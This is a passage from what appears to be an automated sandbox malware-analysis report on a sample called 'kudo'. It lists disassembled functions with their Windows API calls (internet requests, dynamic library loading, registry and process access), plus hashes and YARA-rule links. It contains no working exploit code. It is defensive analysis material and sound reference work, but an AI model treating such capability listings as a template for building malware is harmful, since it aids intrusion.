                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Menu$Delete$InfoItem_memset
                                                      • String ID: 0
                                                      • API String ID: 1173514356-4108050209
                                                      • Opcode ID: 1c06a7dec46ff9bd135e7f3ce2040d4a5e9cec7fb7a04be2a6012babf4126406
                                                      • Instruction ID: d6bdef26fb287ca14f530d12183c76db157f5e6cfbab7f3ee69555bee93f562a
                                                      • Opcode Fuzzy Hash: 1c06a7dec46ff9bd135e7f3ce2040d4a5e9cec7fb7a04be2a6012babf4126406
                                                      • Instruction Fuzzy Hash: F3418C706047019FD720DF28CC44B1ABBE8FF85314F0549ADF9A5D7292D734A805CB62
                                                      Function 0087D7A5 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CharLowerBuffW.USER32(?,?), ref: 0087D7C5
                                                        • Part of subcall function 0080784B: _memmove.LIBCMT ref: 00807899
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: BuffCharLower_memmove
                                                      • String ID: cdecl$none$stdcall$winapi
                                                      • API String ID: 3425801089-567219261
                                                      • Opcode ID: db8f5537be6564afcb2ec501d138c62c2d689c792e4c37d58a26abd933b528d0
                                                      • Instruction ID: cea065570e3a51c900fcbaba5855c220e0ee336bb8d4523ce1cf65255da05483
                                                      • Opcode Fuzzy Hash: db8f5537be6564afcb2ec501d138c62c2d689c792e4c37d58a26abd933b528d0
                                                      • Instruction Fuzzy Hash: 9331AD71904219ABCF00EF58CC919EEB3B4FF05320B008A29E96AD77D6DB31E905CB91
                                                      Function 00858E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00807DE1: _memmove.LIBCMT ref: 00807E22
                                                        • Part of subcall function 0085AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0085AABC
                                                      • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00858F14
                                                      • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00858F27
                                                      • SendMessageW.USER32(?,00000189,?,00000000), ref: 00858F57
                                                        • Part of subcall function 00807BCC: _memmove.LIBCMT ref: 00807C06
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$_memmove$ClassName
                                                      • String ID: ComboBox$ListBox
                                                      • API String ID: 365058703-1403004172
                                                      • Opcode ID: a2ac8d98556e4d6bec6489113bd118c93ed078ffbab4853cb06678baac09f4e7
                                                      • Instruction ID: 50f35387cc0054fc3054f6ae384fe1a0fc9bd8c5cfdf904b12f5ea3e565b3bb5
                                                      • Opcode Fuzzy Hash: a2ac8d98556e4d6bec6489113bd118c93ed078ffbab4853cb06678baac09f4e7
                                                      • Instruction Fuzzy Hash: C921F571900108BEDB14ABA89C85CFF7B69FF05320B10462AF825E72E1DE39184DDA20
                                                      Function 0087182D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0087184C
                                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00871872
                                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 008718A2
                                                      • InternetCloseHandle.WININET(00000000), ref: 008718E9
                                                        • Part of subcall function 00872483: GetLastError.KERNEL32(?,?,00871817,00000000,00000000,00000001), ref: 00872498
                                                        • Part of subcall function 00872483: SetEvent.KERNEL32(?,?,00871817,00000000,00000000,00000001), ref: 008724AD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                      • String ID:
                                                      • API String ID: 3113390036-3916222277
                                                      • Opcode ID: ad8945130f948d0563cdb6d55fd521b16de387d84124efa09ff43716500af8be
                                                      • Instruction ID: 38483b0d4763e12168aaf396b4d6951dd107ab759738f9a7a029ce298aebbf6b
                                                      • Opcode Fuzzy Hash: ad8945130f948d0563cdb6d55fd521b16de387d84124efa09ff43716500af8be
                                                      • Instruction Fuzzy Hash: 4E21B0B1504208BFEB11AF68DC89EBB77EDFB48744F10813AF549D2544DA34CD0597A2
                                                      Function 008863E7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00801D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00801D73
                                                        • Part of subcall function 00801D35: GetStockObject.GDI32(00000011), ref: 00801D87
                                                        • Part of subcall function 00801D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00801D91
                                                      • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00886461
                                                      • LoadLibraryW.KERNEL32(?), ref: 00886468
                                                      • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 0088647D
                                                      • DestroyWindow.USER32(?), ref: 00886485
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                      • String ID: SysAnimate32
                                                      • API String ID: 4146253029-1011021900
                                                      • Opcode ID: b4b823ef9cd748b438a4c7849bda855c7848208ad6dd5ebcb4496cfbcf6e4af0
                                                      • Instruction ID: 3ac708fed6a415713a9cdd1c4fa221cb579711af9785c3bd925d2656f1350863
                                                      • Opcode Fuzzy Hash: b4b823ef9cd748b438a4c7849bda855c7848208ad6dd5ebcb4496cfbcf6e4af0
                                                      • Instruction Fuzzy Hash: 2B218E71110205ABEF10AF68DC80EBF37A9FF58328F204629FA10D21A1E7319C619764
                                                      Function 00866D9C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetStdHandle.KERNEL32(0000000C), ref: 00866DBC
                                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00866DEF
                                                      • GetStdHandle.KERNEL32(0000000C), ref: 00866E01
                                                      • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00866E3B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: CreateHandle$FilePipe
                                                      • String ID: nul
                                                      • API String ID: 4209266947-2873401336
                                                      • Opcode ID: 94dfd29f09b35e894a4dc7cb8bb3c1d869fbcae2435e0fcf76ada9d6ab0ddd04
                                                      • Instruction ID: 2833fb9d40e23afaaf3b22014785769d09f8283eda87fc764a150b5e94c2a222
                                                      • Opcode Fuzzy Hash: 94dfd29f09b35e894a4dc7cb8bb3c1d869fbcae2435e0fcf76ada9d6ab0ddd04
                                                      • Instruction Fuzzy Hash: 6621B674600349ABDB209F29DC05B9A77F8FF44760F214629FDA0D72D0EB719960CB50
                                                      Function 00866E6A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetStdHandle.KERNEL32(000000F6), ref: 00866E89
                                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00866EBB
                                                      • GetStdHandle.KERNEL32(000000F6), ref: 00866ECC
                                                      • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00866F06
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: CreateHandle$FilePipe
                                                      • String ID: nul
                                                      • API String ID: 4209266947-2873401336
                                                      • Opcode ID: a8835190517781206f27dc23790e76276e49ed938b9cce8297a159cedc4d8c55
                                                      • Instruction ID: 9418be54c182947257eefb78b6235ca98555805a01c05937af0fa65444fdc8db
                                                      • Opcode Fuzzy Hash: a8835190517781206f27dc23790e76276e49ed938b9cce8297a159cedc4d8c55
                                                      • Instruction Fuzzy Hash: FC21A179500345DBDB209F69DC04A9A77A8FF45724F310B19FDA0D72D0EB71A860CB61
                                                      Function 0086AC40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetErrorMode.KERNEL32(00000001), ref: 0086AC54
                                                      • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0086ACA8
                                                      • __swprintf.LIBCMT ref: 0086ACC1
                                                      • SetErrorMode.KERNEL32(00000000,00000001,00000000,0088F910), ref: 0086ACFF
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: ErrorMode$InformationVolume__swprintf
                                                      • String ID: %lu
                                                      • API String ID: 3164766367-685833217
                                                      • Opcode ID: 56b3c9979edba42591fe9748e2efe91a0196bb6c7e1bcc2f0f5a7a65e4e70fe8
                                                      • Instruction ID: 777f97665311615b2277d19bc09ab3e7d98ec8f9522bf60b37d9847e28c600fd
                                                      • Opcode Fuzzy Hash: 56b3c9979edba42591fe9748e2efe91a0196bb6c7e1bcc2f0f5a7a65e4e70fe8
                                                      • Instruction Fuzzy Hash: 68214474600109AFCB10DF69DD85DAE7BB8FF49714B004069F909EB352DB35EA51CB62
                                                      Function 00861AE8 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CharUpperBuffW.USER32(?,?), ref: 00861B19
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: BuffCharUpper
                                                      • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                      • API String ID: 3964851224-769500911
                                                      • Opcode ID: e868a6bd33cd5e7259ae5810ae90b7c059a737c239e4fc59eddd6efa8e4f52e1
                                                      • Instruction ID: be06de68fd6ee3c266272138b4f3bc89f88a26bea3efec99d45009ac772b24b3
                                                      • Opcode Fuzzy Hash: e868a6bd33cd5e7259ae5810ae90b7c059a737c239e4fc59eddd6efa8e4f52e1
                                                      • Instruction Fuzzy Hash: E7115E31900119CFCF00EF98D8958EEB7B4FF25304B944465D915E7692EB325D0ACF51
                                                      Function 0087EB55 Relevance: 7.7, APIs: 5, Instructions: 247COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0087EC07
                                                      • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0087EC37
                                                      • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0087ED6A
                                                      • CloseHandle.KERNEL32(?), ref: 0087EDEB
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                      • String ID:
                                                      • API String ID: 2364364464-0
                                                      • Opcode ID: 623b66c9d080fdf5b3ac4b78cb749a1d57dc9a881bf0d7f527c985ac869d67df
                                                      • Instruction ID: 7f31689f197b3696fae6b9b05333e5be8ddc52028db2944542d4986c49e94b76
                                                      • Opcode Fuzzy Hash: 623b66c9d080fdf5b3ac4b78cb749a1d57dc9a881bf0d7f527c985ac869d67df
                                                      • Instruction Fuzzy Hash: 38812CB16047109FD760EF28CC86B2AB7E5FF48720F14896DF999DB2D2D670AC408B52
                                                      Function 00880037 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00807DE1: _memmove.LIBCMT ref: 00807E22
                                                        • Part of subcall function 00880E1A: CharUpperBuffW.USER32(?,?), ref: 00880E31
                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 008800FD
                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0088013C
                                                      • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00880183
                                                      • RegCloseKey.ADVAPI32(?,?), ref: 008801AF
                                                      • RegCloseKey.ADVAPI32(00000000), ref: 008801BC
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                      • String ID:
                                                      • API String ID: 3440857362-0
                                                      • Opcode ID: 6fad45d9178879891c8ee354cb57e0105f44c01c329104349eb2ed5c4f6bc587
                                                      • Instruction ID: 55841ba4d44fc690e49c2db5d24d2ae43504ccd4104365b3027b9d65448c49dc
                                                      • Opcode Fuzzy Hash: 6fad45d9178879891c8ee354cb57e0105f44c01c329104349eb2ed5c4f6bc587
                                                      • Instruction Fuzzy Hash: E5511771208204AFD754EF58CC85E6AB7E9FF84314F40892DF596C72A2EB31E949CB52
                                                      Function 0087D8C8 Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00809837: __itow.LIBCMT ref: 00809862
                                                        • Part of subcall function 00809837: __swprintf.LIBCMT ref: 008098AC
                                                      • LoadLibraryW.KERNEL32(?), ref: 0087D927
                                                      • GetProcAddress.KERNEL32(00000000,?,?,?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0087D9AA
                                                      • GetProcAddress.KERNEL32(00000000,00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0087D9C6
                                                      • GetProcAddress.KERNEL32(00000000,?,?,?,00000041,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0087DA07
                                                      • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0087DA21
                                                        • Part of subcall function 00805A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00867896,?,?,00000000), ref: 00805A2C
                                                        • Part of subcall function 00805A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00867896,?,?,00000000,?,?), ref: 00805A50
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                      • String ID:
                                                      • API String ID: 327935632-0
                                                      • Opcode ID: 42a3d4a8abfdc3ac0a996c0f617f8c0ed168a8ac18f519daf4ffae2f2a4cd483
                                                      • Instruction ID: 6b396c4f9225338fb6ece996144d1284cc5325303d656fd513ef1ae802cc0e93
                                                      • Opcode Fuzzy Hash: 42a3d4a8abfdc3ac0a996c0f617f8c0ed168a8ac18f519daf4ffae2f2a4cd483
                                                      • Instruction Fuzzy Hash: 9451F035A00219DFCB40EFA8C8859AABBB4FF09324B14C069E959EB352D731ED45CF91
                                                      Function 0086E571 Relevance: 7.6, APIs: 5, Instructions: 135COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0086E61F
                                                      • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 0086E648
                                                      • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0086E687
                                                        • Part of subcall function 00809837: __itow.LIBCMT ref: 00809862
                                                        • Part of subcall function 00809837: __swprintf.LIBCMT ref: 008098AC
                                                      • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0086E6AC
                                                      • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0086E6B4
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
